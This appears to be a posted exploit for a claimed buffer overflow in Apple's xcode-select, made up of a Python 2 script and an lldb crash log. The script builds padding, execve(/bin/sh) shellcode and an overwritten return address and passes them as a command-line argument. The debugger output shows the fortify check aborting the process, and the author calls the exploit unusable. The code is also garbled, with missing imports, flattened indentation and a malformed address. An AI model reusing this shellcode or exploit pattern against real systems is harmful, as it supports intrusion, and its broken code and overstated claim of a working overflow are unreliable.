|
# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer
directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD
development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None
junk = "\x90"*5631
shellcode =
"\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"
#OSX/x86 intel - execve(/bin/sh) - 24 bytes
buffer = "\x90\x90\x90\x90"*89
eip = "\x7f\xff\x8e\x19\x98\x66"
print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"
try:
subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "xcode-select not found!"
else:
print "Error executing exploit"
raise
Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20
0x7fff8e199868: movq %rax, %rdi
0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel
0x7fff8e199870: ret
(lldb)
(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866
libsystem_kernel.dylib`__pthread_kill + 10, queue =
'com.apple.main-thread', stop reason = signal SIGABRT
* frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
frame #8: 0x0000000100006315
libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
frame #9: 0x0000000100000e75
xcode-select`___lldb_unnamed_function3$xcode-select + 57
frame #10: 0x0000000100001562
xcode-select`___lldb_unnamed_function5$xcode-select + 1083a
(lldb) register r -a
General Purpose Registers:
rax = 0x0000000000000000
rbx = 0x00007fff769df310 libsystem_pthread.dylib`_thread
rcx = 0x00007fff5fbfce18
rdx = 0x0000000000000000
rdi = 0x0000000000000d0b
rsi = 0x0000000000000006
rbp = 0x00007fff5fbfce40
rsp = 0x00007fff5fbfce18
r8 = 0x00000000fffffc00
r9 = 0x00007fff5fbfce00
r10 = 0x0000000008000000
r11 = 0x0000000000000206
r12 = 0x0000000000000400
r13 = 0x000000000000000e
r14 = 0x0000000000000006
r15 = 0x00007fff5fbfd120
rip = 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
rflags = 0x0000000000000206
cs = 0x0000000000000007
fs = 0x0000000000000000
gs = 0x0000000000030000
eax = 0x00000000
ebx = 0x769df310
ecx = 0x5fbfce18
edx = 0x00000000
edi = 0x00000d0b
esi = 0x00000006
ebp = 0x5fbfce40
esp = 0x5fbfce18
r8d = 0xfffffc00
r9d = 0x5fbfce00
r10d = 0x08000000
r11d = 0x00000206
r12d = 0x00000400
r13d = 0x0000000e
r14d = 0x00000006
r15d = 0x5fbfd120
|